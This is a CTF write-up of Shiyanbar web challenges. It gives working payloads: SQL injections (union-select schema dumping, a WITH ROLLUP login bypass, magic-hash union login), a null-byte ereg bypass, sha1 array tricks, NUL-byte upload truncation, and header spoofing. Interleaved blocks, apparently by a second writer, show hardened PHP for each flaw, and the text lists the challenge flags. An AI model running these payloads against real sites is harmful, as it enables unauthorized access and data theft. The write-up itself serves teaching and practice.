Shiyanbar (实验吧) web writeup (continuously updated)

Log in, would you? (登陆一下好吗)

payload:

username='=' &password=' = '

The back-end query after injection becomes:

select XXX from XXX where user = ' '=' ' AND pass = ' '=' '

MySQL evaluates user='' to 0 and then 0='' to true, so both conditions hold for every row.

Flag:

ctf{51d1bf8fb65a8c2406513ee8f52283e7}
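As an added example (not the challenge's or the author's code), here is the same login query with its values bound as parameters instead of spliced into the SQL text, which is what makes the '=' trick above impossible. It assumes the PDO SQLite driver is available and builds an in-memory users table with one constructed row; the spliced_sql() function only returns the text the vulnerable shape would have run, for contrast. The id lookup at the end applies the same idea to the integer-id injection in the "这个看起来有点难" challenge further down.

```php
<?php
// Added example, not the challenge's code: the login query with bound values.
// Uses PDO with an in-memory SQLite database so it runs offline; the users
// table and its single row are constructed here.

function connect(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE NOT NULL, pw_hash TEXT NOT NULL)');
    $ins = $db->prepare('INSERT INTO users (username, pw_hash) VALUES (:u, :h)');
    $ins->execute([':u' => 'chybeta', ':h' => password_hash('correct horse', PASSWORD_DEFAULT)]);
    return $db;
}

// The challenge's shape: input spliced into the SQL text. With username '='
// the WHERE clause becomes user = ''='' AND ..., which MySQL evaluates as
// (user='')='' , i.e. 0='' , i.e. true. Returned only for contrast, never run.
function spliced_sql(string $username, string $password): string {
    return "SELECT * FROM users WHERE user = '$username' AND pass = '$password'";
}

// Hardened: the username travels as a bound value, so quote characters are
// data, and the password is verified against a stored hash outside the query.
function login(PDO $db, string $username, string $password): bool {
    $stmt = $db->prepare('SELECT pw_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['pw_hash']);
}

// Same idea for an integer id: require a plain decimal string, cast, and bind
// with PDO::PARAM_INT so text appended to the id can never be parsed as SQL.
function user_by_id(PDO $db, string $rawId): ?string {
    if (!ctype_digit($rawId)) {
        return null;
    }
    $stmt = $db->prepare('SELECT username FROM users WHERE id = :id');
    $stmt->bindValue(':id', (int)$rawId, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : $name;
}

$db = connect();
var_dump(login($db, 'chybeta', 'correct horse'));  // bool(true)
var_dump(login($db, "'='", "' = '"));              // bool(false): looked up as a literal name
var_dump(user_by_id($db, '1'));                    // string(7) "chybeta"
var_dump(user_by_id($db, '1 union select 1'));     // NULL: not a plain integer
echo spliced_sql("'='", "' = '"), "\n";            // the text the vulnerable version would run
```

The point of the contrast is that the bound version never has a "query string" into which the input could be inserted: the database receives the statement and the values separately, so the comparison that the write-up turned into ''='' stays a comparison of one column against one literal.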

who are you?

Topics: time-based blind injection, INSERT injection.
Headers used to spoof the client IP:

X-Forwarded-For
Client-IP
x-remote-IP
x-originating-IP
x-remote-addr

The "interesting" bypass (因缺思汀的绕过)

View the page source. A comment contains:

source: source.txt

Visiting it gives the source:

<?php
error_reporting(0);
if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="uname" type="text"/>'."<br/>";
    echo '<input name="pwd" type="text"/>'."<br/>";
    echo '<input type="submit" />'."<br/>";
    echo '</form>'."<br/>";
    echo '<!--source: source.txt-->'."<br/>";
    die;
}
function AttackFilter($StrKey,$StrValue,$ArrReq){
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){
        print "水可载舟,亦可赛艇!";
        exit();
    }
}
$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){
    AttackFilter($key,$value,$filter);
}
$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql);
if (mysql_num_rows($query) == 1) {
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇!";
    }
}else{
    print "一颗赛艇!";
}
mysql_close($con);
?>

This uses MySQL's WITH ROLLUP trick. First, a plain SELECT:

mysql> SELECT uname,pass FROM test.table;
+---------+------+
| uname | pass |
+---------+------+
| chybeta | 123 |
+---------+------+
1 row in set (0.00 sec)

Now add group by pass with rollup:

mysql> SELECT uname,pass FROM test.table group by pass with rollup;
+---------+------+
| uname | pass |
+---------+------+
| chybeta | 123 |
| chybeta | NULL |
+---------+------+
2 rows in set (0.01 sec)

ROLLUP appends one extra row to the result, with NULL in the pass column. So when the pwd we POST is empty, the condition $key['pwd'] == $_POST['pwd'] is satisfied, because NULL == '' is true under PHP's loose comparison.

Before that, there is another condition to satisfy: mysql_num_rows($query) == 1, so we must select only the single row whose pass is NULL. From the source we know the comma is filtered, so we cannot simply write limit 1,1; instead we use limit 1 offset 1. Locally, for example:

mysql> SELECT uname,pass FROM test.table group by pass with rollup limit 1 offset 1;
+---------+------+
| uname | pass |
+---------+------+
| chybeta | NULL |
+---------+------+
1 row in set (0.01 sec)

The final payload:

uname=' or 1=1 group by pwd with rollup limit 1 offset 2 #&pwd=

The offset is 2 because ROLLUP appends its row at the end of the result set, and we do not know how many rows or 1=1 returns, so the 2 was found by fuzzing.

Flag:

CTF{with_rollup_interesting}

Simple SQL injection (简单的sql注入)

http://ctf5.shiyanbar.com/423/web/

Once More

<?php
if (isset ($_GET['password'])) {
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
    {
        echo '<p>You password must be alphanumeric</p>';
    }
    else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
    {
        if (strpos ($_GET['password'], '*-*') !== FALSE)
        {
            die('Flag: ' . $flag);
        }
        else
        {
            echo('<p>*-* have not been found</p>');
        }
    }
    else
    {
        echo '<p>Invalid password</p>';
    }
}
?>

The first check uses ereg, which allows only letters and digits, but ereg has a flaw (it is not binary-safe) and can be bypassed with %00. The second check wants a string with few characters that is nevertheless greater than 9999999, which scientific notation satisfies. The innermost check requires *-*, which we simply append after the %00.
payload:

http://ctf5.shiyanbar.com/web/more.php?password=9e9%00*-*

flag:

CTF{Ch3ck_anD_Ch3ck}
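As an added example (not the challenge's or the author's code), this is how the three checks in "Once More" look once each weakness above is closed: a binary-safe alphanumeric test with an anchored regex instead of ereg, an explicit NUL-byte rejection, and a numeric comparison that is only attempted after the string is proven to be a plain decimal integer. The four test inputs are constructed, the first being the write-up's payload after URL decoding.

```php
<?php
// Added example, not the challenge's code: a hardened version of the three
// checks in "Once More". The test inputs at the bottom are constructed.

// Binary-safe alphanumeric test. ctype_alnum() does not stop at a NUL byte,
// so "9e9\0*-*" fails it, and the regex is anchored with \A ... \z rather than
// ^ ... $ because $ also matches just before a trailing newline.
function is_alnum_strict(string $s): bool {
    return $s !== '' && ctype_alnum($s) && preg_match('/\A[A-Za-z0-9]+\z/', $s) === 1;
}

function check_password(string $p): string {
    if (strpos($p, "\0") !== false) {
        return 'rejected: NUL byte';
    }
    if (!is_alnum_strict($p)) {
        return 'rejected: not alphanumeric';
    }
    // Only compare numerically once the string is a plain decimal integer.
    // "9e9" is numeric to PHP (a float of 9000000000) yet only 3 characters
    // long, which is exactly how the original length/value pair was satisfied.
    if (!ctype_digit($p)) {
        return 'rejected: not a decimal integer';
    }
    if (strlen($p) < 8 && (int)$p > 9999999) {
        return 'accepted';   // never reached: a decimal string under 8 chars is at most 9999999
    }
    return 'rejected: length/value rule';
}

// Constructed inputs, including the write-up's 9e9%00*-* after URL decoding.
foreach (["9e9\0*-*", '9e9', '12345678', '9999999'] as $case) {
    printf("%-10s => %s\n", addcslashes($case, "\0"), check_password($case));
}
```

Written this way, the length rule and the value rule can never both hold for a decimal string; the challenge's pair of conditions was only satisfiable through PHP's numeric-string coercion, so a real application would have to decide which of the two it actually means.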

Guess Next Session

http://ctf5.shiyanbar.com/web/Session.php

The source is given:

<?php
session_start();
if (isset ($_GET['password'])) {
    if ($_GET['password'] == $_SESSION['password'])
        die ('Flag: '.$flag);
    else
        print '<p>Wrong guess.</p>';
}
mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));
?>

The "prediction" is a decoy. session_start() uses PHPSESSID=oso27id67fqu8hbvq57bacahn3 as the identity, so if we change a few letters in PHPSESSID, the server starts a fresh session in which $_SESSION['password'] is empty; then we set our password to empty as well,

and we get the flag:

FALSE

http://ctf5.shiyanbar.com/web/false.php

The source is given:

<?php
if (isset($_GET['name']) and isset($_GET['password'])) {
    if ($_GET['name'] == $_GET['password'])
        echo '<p>Your password can not be your name!</p>';
    else if (sha1($_GET['name']) === sha1($_GET['password']))
        die('Flag: '.$flag);
    else
        echo '<p>Invalid password.</p>';
}
else{
    echo '<p>Login first!</p>';
}
?>

The name and password must differ, and the later sha1 comparison uses ===, so there is no weak-typing issue there. But sha1 cannot handle arrays: when we pass name[]=1&password[]=2, the comparison becomes sha1(Array) === sha1(Array), i.e. NULL === NULL, and the flag is returned. Local test:

<?php
$name = $_GET['name'];
var_dump(@sha1($name));
?>

payload:

http://ctf5.shiyanbar.com/web/false.php?name[]=1&password[]=2
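The ROLLUP, "Guess Next Session" and FALSE challenges all come down to the same thing: a comparison against a value that is missing or is not a string. As an added example (not the challenge's or the author's code), the block below reproduces each of the three with constructed values and then shows one check that refuses all of them: it requires a string, requires the stored value to exist, and compares with hash_equals.

```php
<?php
// Added example, not the challenge's code. Puts the three loose-comparison
// pitfalls from the ROLLUP, "Guess Next Session" and FALSE challenges side by
// side with one strict check; every input here is constructed.

// 1. The WITH ROLLUP row carries NULL in the password column, and NULL == ''.
var_dump(null == '');    // bool(true)
var_dump(null === '');   // bool(false)

// 2. A key that was never written to the session reads as NULL, so it == '' too.
$session = [];           // stands in for $_SESSION after an unknown PHPSESSID
var_dump(($session['password'] ?? null) == '');   // bool(true)

// 3. On PHP 7, sha1() of an array returns NULL (with a warning), so
//    sha1([1]) === sha1([2]) is NULL === NULL. PHP 8 throws a TypeError instead.
try {
    var_dump(@sha1([1]) === @sha1([2]));   // PHP 7: bool(true)
} catch (TypeError $e) {
    echo "PHP 8: sha1() rejects arrays\n";
}

// Strict check: require a string, require that a stored value exists, and
// compare in constant time via hash_equals on digests of equal length.
function verify_secret($submitted, ?string $stored): bool {
    if (!is_string($submitted) || $stored === null || $stored === '') {
        return false;
    }
    return hash_equals(hash('sha256', $stored), hash('sha256', $submitted));
}

var_dump(verify_secret('', null));       // bool(false): nothing stored, '' does not match
var_dump(verify_secret([1], 'x'));       // bool(false): arrays are rejected before hashing
var_dump(verify_secret('abc', 'abc'));   // bool(true)
```

Hashing both sides before hash_equals() is what keeps the comparison constant-time even when the two strings differ in length; the is_string() guard is what makes the FALSE trick irrelevant, since the request never reaches a hash function with an array.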

Upload bypass (上传绕过)

Upload path truncation.

  1. Intercept with Burp and change the file name to uploads/cap.php .jpg
  2. Switch to the hex view and change the space (20) to 00
  3. Send the request.

flag{SimCTF_huachuan}
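As an added example (not the challenge's or the author's code), here is upload handling on which the NUL-byte name trick above has no effect: the stored name is generated rather than taken from the client, the extension is whitelisted, and the file type is checked from the content rather than the name. The file names in the loop and the temporary file are constructed.

```php
<?php
// Added example, not the challenge's code: server-side handling of an upload
// that is unaffected by the NUL-byte / "cap.php .jpg" name trick above. The
// stored name is generated, the extension is whitelisted, and the file type is
// taken from the content rather than the name. All inputs are constructed.

function stored_name_for(string $client_name, array $allowed = ['jpg', 'png', 'gif']): ?string {
    // A NUL byte in a file name is never legitimate; reject rather than truncate.
    if (strpos($client_name, "\0") !== false) {
        return null;
    }
    // Only the last extension counts, and nothing of the original base name
    // survives into the stored name, so "cap.php" cannot end up on disk.
    $ext = strtolower(pathinfo(basename($client_name), PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return null;
    }
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

// getimagesize() parses the magic bytes; a script renamed to .jpg fails here.
function content_is_image(string $path): bool {
    return @getimagesize($path) !== false;
}

foreach (["cap.php\0.jpg", 'cap.php .jpg', 'photo.JPG', 'shell.php'] as $n) {
    printf("%-16s => %s\n", addcslashes($n, "\0"), stored_name_for($n) ?? 'rejected');
}

// A file whose name says image but whose body is PHP is caught by the content check.
$tmp = tempnam(sys_get_temp_dir(), 'upl');
file_put_contents($tmp, "<?php echo 1;");
var_dump(content_is_image($tmp));   // bool(false)
unlink($tmp);
```

Note that "cap.php .jpg" is accepted by stored_name_for(), but what lands on disk is a random name ending in .jpg; the content check is what then rejects a body that is not an image, so neither the name nor the bytes can be used to get a script served.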

Program logic problem (程序逻辑问题)

http://ctf5.shiyanbar.com/web/5/index.php

Visit it and view the page source; it points to an index.txt with the source:

<?php
if($_POST[user] && $_POST[pass]) {
    $conn = mysql_connect("********", "*****", "********");
    mysql_select_db("phpformysql") or die("Could not select database");
    if ($conn->connect_error) {
        die("Connection failed: " . mysql_error($conn));
    }
    $user = $_POST[user];
    $pass = md5($_POST[pass]);
    $sql = "select pw from php where user='$user'";
    $query = mysql_query($sql);
    if (!$query) {
        printf("Error: %s\n", mysql_error($conn));
        exit();
    }
    $row = mysql_fetch_array($query, MYSQL_ASSOC);
    //echo $row["pw"];
    if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
        echo "<p>Logged in! Key:************** </p>";
    }
    else {
        echo("<p>Log in failure!</p>");
    }
}
?>

$user is not filtered, so try error-based injection:

user='and extractvalue(1, concat(0x5c, (select pw from phpformysql.php limit 1)))#&pass=1

The result is awkward:

welcome to simplexue Error: SELECT command denied to user 'web6lo'@'localhost' for table 'php'

Well, the challenge says it is a logic flaw, so let's look for one. The username and password are checked separately, and the username is injectable. So the idea is to send this as the username:

user=' union select "0e830400451993494058024219903391"

The resulting SQL statement:

select pw from php where user=' ' union select "0e830400451993494058024219903391"

The first SELECT returns nothing, so the result is the string we injected, 0e830400451993494058024219903391; that is, $row[pw] = 0e830400451993494058024219903391. And md5(QNKCDZO) is exactly that 0e string.

Final payload:

user=' union select "0e830400451993494058024219903391"#&pass=QNKCDZO

Flag:

SimCTF{youhaocongming}

what a fuck! What on earth is this? (这是什么鬼东西?)

It is JSFuck. Run it in the F12 console to get the flag:

Ihatejs

PHP is great (php大法好)

Visit

http://ctf5.shiyanbar.com/DUTCTF/index.php

which gives the hint:

Can you authenticate to this website? index.php.txt

Visit that to get the source:

<?php
if(eregi("hackerDJ",$_GET[id])) {
    echo("<p>not allowed!</p>");
    exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
    echo "<p>Access granted!</p>";
    echo "<p>flag: *****************} </p>";
}
?>
<br><br>
Can you authenticate to this website?

Double URL decoding. payload:

payload 1:
http://ctf5.shiyanbar.com/DUTCTF/index.php?id=%25%36%38%25%36%31%25%36%33%25%36%62%25%36%35%25%37%32%25%34%34%25%34%61
payload 2:
http://ctf5.shiyanbar.com/DUTCTF/index.php?id=%2568%2561%2563%256b%2565%2572%2544%254a

flag:

DUTCTF{PHP_is_the_best_program_language}
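The flaw in the source above is ordering: the blacklist runs on the raw parameter and the decode happens afterwards. As an added example (not the challenge's or the author's code), the block below canonicalizes first, with a bounded decode loop, and runs the check on the canonical form. The two encoded inputs are the write-up's payloads as they appear on the wire; the loop's first round plays the part of the web server's own decode of $_GET.

```php
<?php
// Added example, not the challenge's code. The challenge tested the raw
// parameter with eregi() and only then url-decoded it, so an encoded name
// slipped past. Here the value is canonicalized first and the check runs on
// the canonical form, with a strict comparison. Inputs are constructed.

// Decode repeatedly until the value stops changing, with a small bound so a
// long chain of encodings cannot keep the loop busy.
function canonical_id(string $raw, int $max_rounds = 3): string {
    $value = $raw;
    for ($i = 0; $i < $max_rounds; $i++) {
        $decoded = urldecode($value);
        if ($decoded === $value) {
            break;
        }
        $value = $decoded;
    }
    return $value;
}

function is_allowed_id(string $raw): bool {
    // Case-insensitive as eregi() was, but applied to the fully decoded value.
    return strcasecmp(canonical_id($raw), 'hackerDJ') !== 0;
}

// 'alice' and 'hackerDJ' are constructed; the two encoded forms are the
// write-up's payload 1 and payload 2 as sent on the wire.
$ids = [
    'alice',
    'hackerDJ',
    '%25%36%38%25%36%31%25%36%33%25%36%62%25%36%35%25%37%32%25%34%34%25%34%61',
    '%2568%2561%2563%256b%2565%2572%2544%254a',
];
foreach ($ids as $id) {
    printf("%-75s => %s\n", $id, is_allowed_id($id) ? 'allowed' : 'blocked');
}
```

Both encoded forms decode to hackerDJ within two rounds and are blocked; 'alice' is allowed. The bound on the loop matters as much as the loop itself: an unbounded "decode until stable" on attacker-controlled input is a cheap way to burn CPU.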

This looks a bit hard (这个看起来有点难)

Fuzzing shows it is an integer-type injection.

http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,database()

Get the table name:

http://ctf5.shiyanbar.com/8/index.php?id=1 UNION SELECT 1,GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()

Get the column name:

http://ctf5.shiyanbar.com/8/index.php?id=1 UNION SELECT 1,GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x746869736b6579

Get the flag:

http://ctf5.shiyanbar.com/8/index.php?id=1 UNION SELECT 1,GROUP_CONCAT(k0y+SEPARATOR+0x3c62723e) FROM thiskey

flag:

whatiMyD91dump

Seems a bit hard (貌似有点难)

http://ctf5.shiyanbar.com/phpaudit/

The challenge provides the source:

<?php
function GetIP(){
    if(!empty($_SERVER["HTTP_CLIENT_IP"]))
        $cip = $_SERVER["HTTP_CLIENT_IP"];
    else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
        $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    else if(!empty($_SERVER["REMOTE_ADDR"]))
        $cip = $_SERVER["REMOTE_ADDR"];
    else
        $cip = "0.0.0.0";
    return $cip;
}
$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
    echo "Great! Key is *********";
}
else{
    echo "错误!你的IP不在访问列表之内!";
}
?>

Intercept the request and add X-Forwarded-For: 1.1.1.1

Flag:

SimCTF{daima_shengji}
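GetIP() above, like the header list in the "who are you?" section, treats Client-IP and X-Forwarded-For as facts, although any sender can write them. As an added example (not the challenge's or the author's code), here is a client_ip() that only honours X-Forwarded-For when the TCP peer is a configured trusted proxy, takes the entry that proxy appended, and validates it. The trusted-proxy list and the three $_SERVER-style arrays are constructed.

```php
<?php
// Added example, not the challenge's code. Determines the client address
// without trusting X-Forwarded-For / Client-IP from arbitrary senders: the
// header is only honoured when the TCP peer (REMOTE_ADDR) is a configured
// trusted proxy. The proxy list and the request arrays are constructed.

function client_ip(array $server, array $trusted_proxies): string {
    $peer = $server['REMOTE_ADDR'] ?? '0.0.0.0';
    if (!in_array($peer, $trusted_proxies, true)) {
        // Direct connection: REMOTE_ADDR is the only address the TCP layer vouches for.
        // Client-IP and X-Forwarded-For are ignored entirely here.
        return $peer;
    }
    // X-Forwarded-For is "client, proxy1, ...". The trusted proxy appended the
    // address it saw as the last entry; anything before it came from the
    // network and may have been written by the sender.
    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    $parts = array_map('trim', explode(',', $xff));
    $candidate = end($parts);
    if ($candidate !== false && filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
        return $candidate;
    }
    return $peer;
}

// Constructed requests. Only the second and third arrive via the trusted proxy.
$proxies = ['10.0.0.5'];
$direct  = ['REMOTE_ADDR' => '203.0.113.9', 'HTTP_X_FORWARDED_FOR' => '1.1.1.1', 'HTTP_CLIENT_IP' => '1.1.1.1'];
$proxied = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '1.1.1.1, 198.51.100.7'];
$bogus   = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => 'not-an-ip'];

var_dump(client_ip($direct, $proxies));   // string(11) "203.0.113.9": headers ignored
var_dump(client_ip($proxied, $proxies));  // string(12) "198.51.100.7": set by the trusted proxy
var_dump(client_ip($bogus, $proxies));    // string(8) "10.0.0.5": invalid header, fall back
```

An allow-list check such as the one in the challenge should then compare client_ip() against the list; with this function, a header value of 1.1.1.1 on a direct connection never reaches the comparison at all.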

Cat and mouse (猫捉老鼠)

#WWWnsf0cus_NET#

forbiden

The challenge says: Make sure you are in HongKong
Intercept the request and modify:

Accept-Language: zh-hk

Flag:

123JustUserAGent


Title: 实验吧-web-writeup

Author: chybeta

Published: July 24, 2017 - 21:07

Last updated: August 16, 2017 - 19:08

Original link: http://chybeta.github.io/2017/07/24/实验吧-web-writeup/

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Keep the original link and author when reposting.